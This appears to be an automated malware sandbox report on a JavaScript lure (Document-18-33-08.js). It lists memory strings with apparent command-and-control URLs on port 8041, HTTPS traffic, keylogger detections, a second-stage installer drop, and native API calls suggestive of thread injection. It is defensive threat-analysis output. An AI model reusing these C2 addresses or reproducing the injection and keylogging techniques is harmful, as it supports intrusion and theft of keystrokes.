Source: rundll32.exe, 00000006.00000003.3295432938.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greshunka.com:8041/admin.phpGN
Source: rundll32.exe, 00000006.00000003.3248286213.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greshunka.com:8041/admin.phpUN
Source: rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greshunka.com:8041/admin.phpi
Source: rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greshunka.com:8041/admin.phpl.mui
Source: rundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greshunka.com:8041/admin.phpp
Source: rundll32.exe, 00000006.00000003.3011956610.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3149023230.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3197779910.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3295432938.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greshunka.com:8041/bazar.php
Source: rundll32.exe, 00000006.00000003.2927135917.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greshunka.com:8041/bazar.php3?8
Source: rundll32.exe, 00000006.00000003.3248286213.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3149023230.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3197779910.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3295432938.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greshunka.com:8041/bazar.phpAm=
Source: rundll32.exe, 00000006.00000003.3197779910.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greshunka.com:8041/bazar.phpGN
Source: rundll32.exe, 00000006.00000003.3149156557.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greshunka.com:8041/bazar.phpq#(
Source: rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://greshunka.com:8041/net.com:8041/Pw
Source: explorer.exe, 00000008.00000002.3351439546.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://isomicrotich.com/
Source: explorer.exe, 00000008.00000002.3352293048.000000000C642000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://isomicrotich.com/ECOMPARE.EXE.15Desktop
Source: explorer.exe, 00000008.00000002.3353202323.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://isomicrotich.com/eE
Source: explorer.exe, 00000008.00000002.3346806877.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3352293048.000000000C642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3352293048.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3352962994.000000000C933000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://isomicrotich.com/test/
Source: explorer.exe, 00000008.00000002.3346806877.0000000009B41000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://isomicrotich.com/test/3
Source: explorer.exe, 00000008.00000002.3352962994.000000000C933000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://isomicrotich.com/test/G
Source: explorer.exe, 00000008.00000002.3352293048.000000000C81C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://isomicrotich.com/test/M
Source: explorer.exe, 00000008.00000002.3346806877.00000000099B0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://isomicrotich.com/test/i
Source: explorer.exe, 00000008.00000002.3352962994.000000000C933000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://isomicrotich.com/test/l
Source: explorer.exe, 00000008.00000002.3353202323.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://isomicrotich.com/yEz
Source: explorer.exe, 00000008.00000002.3350911655.000000000B7DD000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://opewolumeras.com/test/
Source: explorer.exe, 00000008.00000002.3350911655.000000000B7DD000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://opewolumeras.com/test/P
Source: explorer.exe, 00000008.00000000.2452717662.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000008.00000000.2456761349.000000000C460000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comcember
Source: rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com/
Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030377151.000001FF4CA1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3036902410.000001FF4CA1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3149156557.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4CA1D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com/)
Source: rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030899621.000001FF4CA52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030550060.000001FF4CA4D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4CA37000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4CA1D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030793340.000001FF4CA4E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com:8041/
Source: rundll32.exe, 00000006.00000003.3036865447.000001FF4CA7A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030485400.000001FF4CA7A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com:8041/$E
Source: rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com:8041/%
Source: rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com:8041/&
Source: rundll32.exe, 00000006.00000003.3036865447.000001FF4CA7A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030485400.000001FF4CA7A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com:8041/0E
Source: rundll32.exe, 00000006.00000002.3332514374.000001FF4CA42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com:8041/8~
Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com:8041/F
Source: rundll32.exe, 00000006.00000002.3332514374.000001FF4CA1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com:8041/L
Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com:8041/N
Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com:8041/Q
Source: rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com:8041/Y
Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com:8041/admin.php
Source: rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com:8041/admin.php.
Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030377151.000001FF4CA1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3036902410.000001FF4CA1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3149156557.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4CA1D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com:8041/admin.php=
Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030377151.000001FF4CA1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3036902410.000001FF4CA1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3149156557.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4CA1D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com:8041/admin.phpM
Source: rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com:8041/bazar.php
Source: rundll32.exe, 00000006.00000003.3031010424.000001FF4CA63000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030899621.000001FF4CA52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030550060.000001FF4CA4D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030793340.000001FF4CA4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com:8041/oQ
Source: explorer.exe, 00000008.00000002.3346806877.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2452717662.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000008.00000002.3346806877.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2452717662.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.comon
Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.dr String found in binary or memory: https://www.advancedinstaller.com
Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.dr String found in binary or memory: https://www.thawte.com/cps0/
Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.dr String found in binary or memory: https://www.thawte.com/repository0W
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50051
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50048 version: TLS 1.2
Creates a DirectInput object (often for capturing keystrokes)
Source: rundll32.exe, 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DirectInput8Create memstr_4797e325-3
Installs a raw input device (often for capturing keystrokes)
Source: rundll32.exe, 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: GetRawInputData memstr_2984fdd2-5
Yara detected Keylogger Generic
Source: Yara match File source: 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5880, type: MEMORYSTR

System Summary
barindex
Sample has a suspicious name (potential lure to open the executable)
Source: Document-18-33-08.js Static file information: Suspicious name
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Microsoft Windows Installer HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{000C1090-0000-0000-C000-000000000046} Jump to behavior
Contains functionality to call native functions
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001FF4C9CDACE NtReadFile, 6_3_000001FF4C9CDACE
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001FF4C9CD9FE NtOpenFile, 6_3_000001FF4C9CD9FE
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001FF4C9CDA6E NtProtectVirtualMemory, 6_3_000001FF4C9CDA6E
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001FF4C9CD98E NtAllocateVirtualMemory, 6_3_000001FF4C9CD98E
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAE7A50 NtSetContextThread, 6_2_000001FF4CAE7A50
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAEF3A0 CreateToolhelp32Snapshot,Thread32First,NtSuspendThread,NtResumeThread,Thread32Next,NtClose, 6_2_000001FF4CAEF3A0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAD17B0 NtClose, 6_2_000001FF4CAD17B0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CB04FF0 NtQueueApcThread, 6_2_000001FF4CB04FF0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CB04BE0 NtProtectVirtualMemory, 6_2_000001FF4CB04BE0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CB03F40 NtAllocateVirtualMemory, 6_2_000001FF4CB03F40
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CB04740 NtFreeVirtualMemory, 6_2_000001FF4CB04740
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CB04360 NtCreateThreadEx, 6_2_000001FF4CB04360
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAE55C0 NtClose,NtTerminateThread, 6_2_000001FF4CAE55C0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CB051C0 NtReadVirtualMemory, 6_2_000001FF4CB051C0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAD71B0 NtClose, 6_2_000001FF4CAD71B0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAD1600 NtClose,RtlExitUserThread, 6_2_000001FF4CAD1600
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CB045F0 NtDuplicateObject, 6_2_000001FF4CB045F0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAE8149 NtSetContextThread, 6_2_000001FF4CAE8149
Source: C:\Windows\explorer.exe Code function: 8_2_0305C704 NtDelayExecution, 8_2_0305C704
Source: C:\Windows\explorer.exe Code function: 8_2_0305B388 NtAllocateVirtualMemory, 8_2_0305B388
Source: C:\Windows\explorer.exe Code function: 8_2_030582B4 NtFreeVirtualMemory, 8_2_030582B4
Source: C:\Windows\explorer.exe Code function: 8_2_030601A0 NtFreeVirtualMemory, 8_2_030601A0
Source: C:\Windows\explorer.exe Code function: 8_2_030581C8 NtWriteFile, 8_2_030581C8
Source: C:\Windows\explorer.exe Code function: 8_2_03058240 NtClose, 8_2_03058240
Source: C:\Windows\explorer.exe Code function: 8_2_030580B8 RtlInitUnicodeString,NtCreateFile, 8_2_030580B8
Creates files inside the system directory
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7623.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF101.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF160.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF1BF.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF1DF.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF22E.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF29D.tmp Jump to behavior
Deletes files inside the Windows folder
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIF101.tmp Jump to behavior
Detected potential crypto function
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FB6A50 4_2_00FB6A50
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FEF032 4_2_00FEF032
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FDC2CA 4_2_00FDC2CA
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FE92A9 4_2_00FE92A9
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FDE270 4_2_00FDE270
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FE84BD 4_2_00FE84BD
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FDA587 4_2_00FDA587
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FED8D5 4_2_00FED8D5
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FBC870 4_2_00FBC870
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FD4920 4_2_00FD4920
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FDA915 4_2_00FDA915
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FE0A48 4_2_00FE0A48
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FB9CC0 4_2_00FB9CC0
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FE5D6D 4_2_00FE5D6D
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180055C62 6_2_0000000180055C62
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180041FEC 6_2_0000000180041FEC
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001CFF8 6_2_000000018001CFF8
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018003203C 6_2_000000018003203C
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180020044 6_2_0000000180020044
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018004C060 6_2_000000018004C060
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001E080 6_2_000000018001E080
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180033088 6_2_0000000180033088
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001F0D0 6_2_000000018001F0D0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001D104 6_2_000000018001D104
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018002C168 6_2_000000018002C168
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180021188 6_2_0000000180021188
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180024198 6_2_0000000180024198
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000001800221A0 6_2_00000001800221A0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000001800251B0 6_2_00000001800251B0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000001800231B8 6_2_00000001800231B8
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001F1D8 6_2_000000018001F1D8
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001E1D8 6_2_000000018001E1D8
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001D260 6_2_000000018001D260
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001E2E0 6_2_000000018001E2E0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001F2E0 6_2_000000018001F2E0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018003430C 6_2_000000018003430C
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001D364 6_2_000000018001D364
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180031388 6_2_0000000180031388
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018002238C 6_2_000000018002238C
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018002539C 6_2_000000018002539C
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000001800233A0 6_2_00000001800233A0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000001800123AC 6_2_00000001800123AC
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000001800213B4 6_2_00000001800213B4
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000001800243C4 6_2_00000001800243C4
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001E3E8 6_2_000000018001E3E8
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018002E400 6_2_000000018002E400
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180032408 6_2_0000000180032408
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001F448 6_2_000000018001F448
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001D490 6_2_000000018001D490
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018004249C 6_2_000000018004249C
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001E4F0 6_2_000000018001E4F0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018002C4F8 6_2_000000018002C4F8
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001C500 6_2_000000018001C500
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018004C510 6_2_000000018004C510
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001F550 6_2_000000018001F550
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018002E554 6_2_000000018002E554
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018003356C 6_2_000000018003356C
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018002358C 6_2_000000018002358C
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001D598 6_2_000000018001D598
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018002159C 6_2_000000018002159C
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000001800245AC 6_2_00000001800245AC
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000001800225BC 6_2_00000001800225BC
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000001800255CC 6_2_00000001800255CC
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001C608 6_2_000000018001C608
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018002B620 6_2_000000018002B620
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001F658 6_2_000000018001F658
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001E65C 6_2_000000018001E65C
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001D6A0 6_2_000000018001D6A0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018002E6D0 6_2_000000018002E6D0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001C710 6_2_000000018001C710
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001F760 6_2_000000018001F760
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180021784 6_2_0000000180021784
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180024794 6_2_0000000180024794
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001E7A0 6_2_000000018001E7A0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000001800227A8 6_2_00000001800227A8
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001D7A8 6_2_000000018001D7A8
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000001800317BC 6_2_00000001800317BC
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000001800237BC 6_2_00000001800237BC
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000001800327EC 6_2_00000001800327EC
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001C81C 6_2_000000018001C81C
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018004A838 6_2_000000018004A838
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001F8B8 6_2_000000018001F8B8
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001E8E4 6_2_000000018001E8E4
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001D900 6_2_000000018001D900
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018002C904 6_2_000000018002C904
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001C978 6_2_000000018001C978
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180022990 6_2_0000000180022990
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000001800239A8 6_2_00000001800239A8
